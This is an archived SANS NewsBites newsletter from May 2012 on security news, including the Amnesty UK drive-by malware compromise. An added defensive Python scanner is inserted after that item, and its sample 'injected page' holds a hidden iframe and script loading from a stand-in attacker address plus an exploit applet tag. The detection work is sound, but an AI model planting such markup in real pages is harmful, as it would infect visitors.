Merit Network NETSEC Archives

[Netsec] SANS NewsBites Vol. 14 Num. 39 : Pentagon To Share Cyber Security Information with Defense Contractors; Amnesty International UK Delivers Malware; Adobe Changes Mind on Handling Vulnerabilities After Backlash

  • From: The SANS Institute
  • Date: Tue May 15 15:12:18 2012

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


**************************************************************************
SANS NewsBites                 May 15, 2012              Vol. 14, Num. 039
**************************************************************************
TOP OF THE NEWS
 Pentagon To Share Cyber Security Information with Defense Contractors
 Amnesty International UK Hijacked to Share Malware
 Adobe Changes Mind on Handling Vulnerabilities After User Backlash
THE REST OF THE WEEK'S NEWS
   Man Pleads Guilty to US $1.3 Million Phishing Scam
   Payroll Data for 700,000 People Goes Missing in Mail
   New Secure TLD Proposed  
   Undercover Investigation in UK Uncovers Trading in Personal Data
   47 Arrested in Carding Ring
   Dutch ISPs Ordered by Court To Block Pirate Bay
   Israeli Authorities Charge 6 People for Massive Data Theft

************************  SPONSORED BY Quest Software ***********************

Ask the Expert Webcast: Privileged Account Management: Enabling Secure Outsourcing and Cloud
Featuring: Dave Shackelford, Jason Fehrenbach and Marc Potter Sponsored
by Quest Software. Tuesday, May 22, 2012 at 1:00 PM EDT
http://www.sans.org/info/105140
**************************************************************************

TRAINING UPDATE
--SANS Rocky Mountain 2012, Denver, CO  June 4-9, 2012
10 courses. Bonus evening presentations include Adjusting Our Defenses
for 2012; and Why Do Organizations Get Compromised?
http://www.sans.org/rocky-mountain-2012/
--Forensics & Incident Response Summit & Training, Austin, TX June 20-27, 2012
Pre-Summit Courses: June 20-25, 2012; Summit: June 26-27, 2012
Techniques and solutions to aid organizations and agencies responding
to crimes and attacks.  Maximize your training by also attending one or
more of the 4 pre-summit courses.
http://www.sans.org/forensics-incident-response-summit-2012/
--SANS Canberra 2012, Canberra, Australia   July 2-10, 2012
5 courses.
http://www.sans.org/canberra-2012/
--Security Impact of IPv6 Summit, Washington, DC July 6, 2012
Walk away with best practices from some who have already implemented
IPv6, in large networks, for a few years.
http://www.sans.org/ipv6-summit-2012/
--SANSFIRE 2012, Washington, DC   July 6-15, 2012
44 courses. Bonus evening presentations include Authentication Issues
Between Entities During Protocol Message Exchange in SCADA Systems;
Critical Infrastructure Control Systems Cybersecurity; and Why Don't We
Consider Our Cars Critical Infrastructure?
http://www.sans.org/sansfire-2012/
--Looking for training in your own community?
http://sans.org/community/
Save on On-Demand training (30 full courses) - See samples at
http://www.sans.org/ondemand/discounts.php#current
Plus Johannesburg, Atlanta, Brisbane, Jakarta, Boston, New York, and
Malaysia all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

********************************************************************

TOP OF THE NEWS
 --Pentagon To Share Cyber Security Information with Defense Contractors
(14th May 2012)
The US government is to expand a cyber security information-sharing
initiative to include up to 1,000 defense contractors.  The program has
been running successfully as a pilot with 36 contractors and 3 large
Internet Service Providers.   According to Eric Rosenbach, deputy
assistant secretary of defense for cyber policy, the Pentagon has
approved expanding the program to include all defense contractors and
ISPs with security clearances.  "This is an important milestone in
voluntary information-sharing between government and industry," he
said.   The Pentagon will share both classified and unclassified
information on cybersecurity threats and countermeasures via a secure
portal called DIBnet.  If the expanded program continues to be
successful it may be extended to companies in other critical
infrastructure sectors.
http://www.washingtonpost.com/politics/pentagon-expands-cybersecurity-exchange/2012/05/13/gIQAwPyQOU_story.html
http://www.nextgov.com/defense/2012/05/pentagon-opens-classified-cyber-program-all-defense-contractors-isps/55707/
[Editor's Note (Murray): Note that no legislation is required.  This is
the right way to approach the so-called "information sharing"
(intelligence sharing) issue. The contractors can provide data, the
government can distill intelligence and feed it back.  Accountability
is preserved.  No immunization required. That said, what the contractors
can expect to see is conclusions, not raw data, not the other guy's
data.
(Liston): Information sharing is the single, lowest-cost "technology"
we can adopt that will make us better defenders.  I sincerely hope that
this program succeeds and is expanded.]

 --Amnesty International UK Hijacked to Share Malware
(11th May 2012)
For two days in May the UK website of Amnesty International was
breached and used by the attackers to infect unsuspecting visitors to
the site with the Gh0st RAT Trojan.  Malicious Java code exploiting the
CVE-2012-0507 Java vulnerability was planted on the website.  Between
the 7th and 9th of May any visitor to the website whose browser carried
an unpatched Java plug-in was at risk of having the malware installed
on their PC.  Gh0st RAT is a remote access Trojan that has been used in
a number of targeted attacks against various organizations, most
notably the 'GhostNet' espionage campaign reported in 2009.
http://www.theregister.co.uk/2012/05/11/amnesty_malware_rat/
http://www.v3.co.uk/v3-uk/news/2174171/cyber-criminals-infect-amnesty-website-spread-trojan
http://www.zdnet.co.uk/blogs/communication-breakdown-10000030/amnesty-websites-compromised-in-gh0st-rat-attack-10026160/
http://www.techcentral.ie/18917/amnesty-uk-website-hacked-to-serve-lethal-gh0st-rat-trojan
[Editor's Note (Liston): How do these people sleep at night?
What do they tell their families that they do for a living?  "Honey, I'm
home... It was a long day at work, but I finally compromised Amnesty
International and planted some exploits... My boss is pretty pleased --
I may get a promotion!"]
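
The Amnesty item above describes a classic drive-by: the site's own
pages were altered to serve a Java applet exploiting CVE-2012-0507, so
the cheapest early warning a site operator has is to watch the HTML the
server actually returns for tags that should never be there.  The
script below is an added example written for this archive; it is not
code from SANS, Amnesty International or any of the reports cited.  It
uses only the Python standard library and runs over constructed sample
markup embedded in the block; the hypothetical example.org site, its
first-party host allowlist and the 203.0.113.7 attacker address are
assumptions.  It flags Java applet/object tags, hidden or off-site
iframes, and script sources loaded from hosts outside the allowlist:

```python
"""Scan served HTML for tags that commonly carry drive-by payloads.

Added example for this archive (not SANS, Amnesty or vendor code).
Standard library only; the sample markup and the first-party host
allowlist below are constructed assumptions for the illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the monitored (hypothetical) site is allowed to load code from.
FIRST_PARTY_HOSTS = {"www.example.org", "static.example.org"}

# MIME types and the ActiveX CLSID that invoke the Java plug-in.
JAVA_MIME_PREFIXES = ("application/x-java", "application/java")
JAVA_CLSID_FRAGMENT = "8ad9c840-044e-11d1-b3e9-00805f499d93"


class InjectionScanner(HTMLParser):
    """Records (kind, reference) pairs for suspicious tags, in page order."""

    def __init__(self, first_party):
        super().__init__()
        self.first_party = {h.lower() for h in first_party}
        self.findings = []

    def _off_site(self, url):
        # Relative URLs have no host and are treated as first-party.
        host = urlparse(url).hostname
        return host is not None and host.lower() not in self.first_party

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            # Any applet on a site that never shipped one is a red flag.
            self.findings.append(("java-applet", a.get("code") or a.get("archive") or ""))
        elif tag in ("object", "embed"):
            mime = a.get("type", "").lower()
            classid = a.get("classid", "").lower()
            if mime.startswith(JAVA_MIME_PREFIXES) or JAVA_CLSID_FRAGMENT in classid:
                self.findings.append(("java-object", a.get("data") or a.get("src") or ""))
        elif tag == "iframe":
            src = a.get("src", "")
            style = a.get("style", "").replace(" ", "").lower()
            # Zero-sized or invisible frames are the usual exploit-kit loader.
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden or self._off_site(src):
                self.findings.append(("iframe", src))
        elif tag == "script":
            src = a.get("src", "")
            if src and self._off_site(src):
                self.findings.append(("script", src))


def scan_html(html, first_party=FIRST_PARTY_HOSTS):
    """Return the list of suspicious (kind, reference) findings in html."""
    scanner = InjectionScanner(first_party)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages: a clean page and the same page after injection.
CLEAN_PAGE = """<html><head><title>Example Org</title>
<script src="https://static.example.org/app.js"></script>
<script src="/js/local.js"></script></head>
<body><iframe src="/embed/video" width="400" height="300"></iframe>
<p>Welcome.</p></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("<p>Welcome.</p>", """<p>Welcome.</p>
<applet code="Exploit.class" archive="/cache/x.jar" width="1" height="1"></applet>
<iframe src="http://203.0.113.7/in.php" width="0" height="0"></iframe>
<script src="http://203.0.113.7/j.js"></script>""")

if __name__ == "__main__":
    for kind, ref in scan_html(INJECTED_PAGE):
        print(f"{kind}: {ref}")
```

Run unchanged it reports the three injected references and nothing for
the clean page; in practice you feed it the response body of each
monitored page on a schedule and alert on any non-empty result.  It is
a heuristic, not an exploit detector: an attacker who can write to the
document root can equally modify a legitimate first-party JavaScript
file, so the served assets themselves should also be hashed and compared
against a known-good baseline.  On the visitor side the exposure ends
with patching; CVE-2012-0507 was fixed in Java SE 6 Update 31 and Java
SE 7 Update 3.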

 --Adobe Changes Mind on Handling Vulnerabilities After User Backlash
(12th May 2012)
Adobe has come under fire for initially suggesting that customers pay
to upgrade their software to obtain patches for security
vulnerabilities.   Users of Adobe's Creative Suite 5.5 and 5.0 were told
by Adobe that they would have to pay US $375 to upgrade to version 6.0
of the software or else "follow security best practices and exercise
caution when opening files from unknown or untrusted sources." But
following angry feedback from customers, and commentary from security
experts, Adobe changed its stance: "We are in the process of
resolving the vulnerabilities addressed in these security bulletins in
Adobe Illustrator CS5.x, Adobe Photoshop CS5.x and Adobe Flash
Professional CS5.x, and will update the respective security bulletins
once the patches are available."  There is no indication yet as to when
those patches will be available.
http://www.v3.co.uk/v3-uk/news/2174307/adobe-criticised-handling-security-flaws
http://www.zdnet.co.uk/news/security-threats/2012/05/14/adobe-changes-course-and-patches-photoshop-for-free-40155215/
http://net-security.org/secworld.php?id=12920
[Editor's Note (Pescatore): A bad original decision by Adobe is not
fully rectified by the current public statements. What will Adobe's
long-term policy be on patching critical vulnerabilities in older
products? It would be nice to see that Adobe's software development
process was improved to result in many, many fewer vulnerabilities in
v6 releases, but enterprise-level patching for older versions is still
needed for a reasonable amount of time.
(Murray): If a vendor could get customers to agree to pay for fixes,
there would be a perverse incentive to ship bad code.
(Liston): Wait... what?!?!  How is Adobe going to be able to generate
the revenue required to continue cranking out the top-notch,
consistently bug-free, software gems for which they're known (i.e.
Flash, Acrobat, Reader, etc...) if they aren't allowed to "gently"
squeeze their customers into upgrading by not patching older versions
of their software?!?! ]

*************************** Sponsored Link:  **************************
1) SANS Analyst Webcast, Streamline Risk Management: Automating the SANS
20 Critical Controls, June 14, 1 PM EDT
http://www.sans.org/info/105145
************************************************************************

THE REST OF THE WEEK'S NEWS
 --Man Pleads Guilty to US $1.3 Million Phishing Scam
(8th May 2012)
A 31-year-old US man from Atlanta, Georgia, has pleaded guilty to his
part in a phishing ring responsible for defrauding people of over US
$1.3 million.  Waya Nwaki, also known as "Shawn Conley," "USAprince12k,"
and "Prince Abuja", pleaded guilty to charges of wire fraud conspiracy,
wire fraud, aggravated identity theft and computer fraud conspiracy.  He
could face up to 47 years in prison and a fine of US $250,000 for each
count.  Sentencing is to take place on August 15th 2012.  According to
the indictment filed with the U.S. District Court in New Jersey, Nwaki
was part of an international gang of fraudsters with others named in the
scheme as Karlis Karklins of Latvia; Charles Umeh Chidi of the United
Kingdom; Alphonsus Osuala and Osarhieme Uyi Obaygbona of Atlanta; Marvin
Dion Hill of College Park, Ga.; and Olani Yi Jones of Nigeria.
http://www.govinfosecurity.com/phisher-guilty-13-million-scam-a-4742
http://www.msnbc.msn.com/id/47342263/ns/technology_and_science-security/t/georgia-man-admits-role-million-global-cyberscam/

 --Payroll Data for 700,000 People Goes Missing in Mail
(12th May 2012)
The personal details of over 700,000 people involved in California's
In-Home Supportive Services are reported to have gone missing in the
mail.  Hewlett Packard, which manages the payroll data for the workers
in California's In-Home Supportive Services, sent the data in microfiche
format via the U.S. Postal Service but the package containing the data
arrived at its destination damaged and incomplete.    The information
contained in the package related to the workers and also the elderly and
disabled clients of the service.  The information that may have been
compromised includes names, Social Security numbers and salary details
dating from October to December 2011.  Oscar Ramirez, a spokesman for
the California Department of Social Services said that "The state has
opened an internal investigation and notified law enforcement. Notices
will be sent to everyone who may be affected, and officials are
reviewing policies to prevent future problems."
http://articles.latimes.com/2012/may/12/local/la-me-0513-homecare-workers-20120513 
http://arstechnica.com/security/2012/05/ca-social-services-office-looses-hundreds-of-thousands-of-recordson-microfiche
http://www.scmagazine.com/data-on-700k-california-home-care-workers-recipients-lost/article/241124/

 --New Secure TLD Proposed  
(11th May 2012)
A new top level domain (TLD) is being proposed to the Internet
Corporation for Assigned Names and Numbers (ICANN) as a secure
alternative to existing domain name spaces.  The ".secure" domain will
be aimed at those organizations requiring a high level of trust and
security of their websites, such as banks and financial institutions.
The proposal is that organizations successfully registering a site
within the ".secure" domain space would need to undergo a thorough
background check and also adhere to a number of strict security
requirements such as end-to-end encryption and regular scanning of sites
for vulnerabilities and malware.  Any sites not adhering to the security
policies would be disconnected.  ICANN is currently reviewing
submissions for new TLDs and is expected to publish its results over the
coming weeks.
http://www.timesofoman.com/innercat.asp?detail=4760
http://www.wired.com/threatlevel/2012/05/dot-secure
http://gcn.com/articles/2012/05/11/dot-secure-domain-would-enforce-rigorous-security.aspx
[Editor's Note (Pescatore): This is unlikely to have any meaningful
impact, as there is no single definition of "secure."
(Murray): Of course, this is what we are entitled to get from SSL
certificates.  Is there any reason to believe that this domain
administrator would do a better job than Verisign? They make money for
issuing credentials, not denying them.]

 --Undercover Investigation in UK Uncovers Trading in Personal Data
(12th May 2012)
An investigation within the UK conducted by the Channel 4 TV station's
Dispatches program alleges that private investigators are paying for
access to personal details of individuals held in government databases.
The program shows how a private investigation firm sold sensitive data
of individuals such as bank account details, social welfare benefit
claims and medical details.  The program highlights that up to five
members of staff a day are disciplined for data offences at the
Department for Work and Pensions.  Under the UK's Data Protection Act,
specifically section 55, it is a criminal offence to: "obtain or
disclose personal data" without permission or "procure the disclosure
to another person".  The report has led to calls for more regulation
into the private investigations industry.
http://www.guardian.co.uk/technology/2012/may/12/trade-personal-data-secret-investigation
http://www.channel4.com/info/press/news/five-staff-a-day-disciplined-for-data-offences-at-the-dwp
[Editor's Note (Murray): While US private investigators do not advertise
their methods, they do promise that data.  These are exactly the
services that HP hired.  One role of the PI relationship is to protect
the principal from the methods of the investigator.]

 --47 Arrested in Carding Ring
(11th May 2012)
The Royal Canadian Mounted Police arrested 47 people in a number of
raids in Montreal and Ontario in a crackdown on a well-organized
international bank card ring responsible for stealing US $7 million and
potentially hundreds of millions more.  The gang installed skimming
devices on ATMs and modified POS terminals so that card data could be
gathered remotely.  In one attack lasting just 5 minutes police claim
the thieves made 203 transactions using 79 fraudulent cards at 23
different bank machines, netting them US $30,000. According to Royal
Canadian Mounted Police Sergeant Yves Leblanc, "This went on once,
twice, three times a day. It went on maybe four or five times a week."
The gang had accomplices in Vancouver, Australia, New Zealand, Malaysia,
Tunisia and England.  The arrests are the result of an investigation
that began in 2008.
http://net-security.org/secworld.php?id=12913
http://www.wired.com/threatlevel/2012/05/mounties-bust-carders/

 --Dutch ISPs Ordered by Court To Block Pirate Bay
(11th May 2012)
In the Netherlands a court has ordered 5 of the country's ISPs to block
access to the Pirate Bay file-sharing service.  In addition, the Court
of The Hague has forbidden the Dutch Pirate Party from informing the
public on how to circumvent the blocking mechanisms or from providing
any proxy services to bypass the filters.  In response the Pirate Party
claims the court is censoring the Internet.
"This is a slap in the face for the free internet and a novel judicial
decision. The judge decided to give the Netherlands another nudge on the
sliding scale of censorship," said a Pirate Party spokesman. In January
of this year a separate court order required 2 separate ISPs to block
access to Pirate Bay. The Pirate Party operated a proxy service which
allowed clients of those ISPs to bypass the filters.
http://www.v3.co.uk/v3-uk/news/2174066/dutch-court-isps-block-pirate-bay
http://www.zdnet.co.uk/blogs/communication-breakdown-10000030/court-bans-dutch-party-from-helping-pirate-bay-10026156/

 --Israeli Authorities Charge 6 People for Massive Data Theft
(13th May 2012)
The district attorney for Tel Aviv, Israel, has charged 6 people for
their involvement in a massive data theft of the country's population
database and exposing the details of up to 9 million people.  The
indictment lists 55-year-old Shalom Bilik, a former contractor of the
Welfare and Social Services Ministry, and alleges that while working at
the ministry he made copies of the population registry database and sold
it.  Others included in the indictment are also accused of selling the
data to third parties. In a separate charge, Bilik is also accused of
copying databases containing the personal information regarding children
up for adoption and their biological parents. The district attorney has
requested that the trial be held in a closed court and a gag order
imposed on the defendants' testimony so that details of the Interior
Ministry's databases and database security can be kept secret to avoid
any further data breaches.
http://www.jpost.com/NationalNews/Article.aspx?id=269728


************************************************************************
The Editorial Board of SANS NewsBites

John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and is President of
STI, The Premier Skills-Based Cyber Security Graduate School,
www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center and Dean of the Faculty of the graduate school at the SANS
Technology Institute.

Ed Skoudis is co-founder of CounterHackChallenges, the nation's top
producer of cyber ranges, simulations, and competitive challenges, now
used from high schools to the Air Force. He is also author and lead
instructor of the SANS Hacker Exploits and Incident Handling course, and
Penetration Testing course.

William Hugh Murray is an executive consultant and trainer in
Information Assurance and Associate Professor at the Naval Postgraduate
School.

Rob Lee is the curriculum lead instructor for the SANS Institute's
computer forensic courses (computer-forensics.sans.org) and a Director
at the incident response company Mandiant.

Rohit Dhamankar is a security professional currently involved in
independent security research.

Tom Liston is a Senior Security Consultant and Malware Analyst for
InGuardians, a handler for the SANS Institute's Internet Storm Center,
and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a founder with Secure Anchor Consulting.

Ron Dick directed the National Infrastructure Protection Center (NIPC)
at the FBI and served as President of the InfraGard National
Members Alliance - with more than 22,000 members.

Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa).  He is leading SANS' global initiative to improve
application security.

David Hoelzer is the director of research & principal examiner for
Enclave Forensics and a senior fellow with the SANS Technology
Institute.

Alan Paller is director of research at the SANS Institute.

Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.

Clint Kreitner is the founding President and CEO of The Center for
Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS infrastructure manager and serves as production
manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
Comment: GPGTools - http://gpgtools.org

iEYEARECAAYFAk+yngkACgkQ+LUG5KFpTkYZ7QCgkBCp0UBUPv8UOPk2SX/RqvhZ
3G0AoI+7Z9dd79Gs1PNyQ1jUOPVEfCnc
=1SOe
-----END PGP SIGNATURE-----


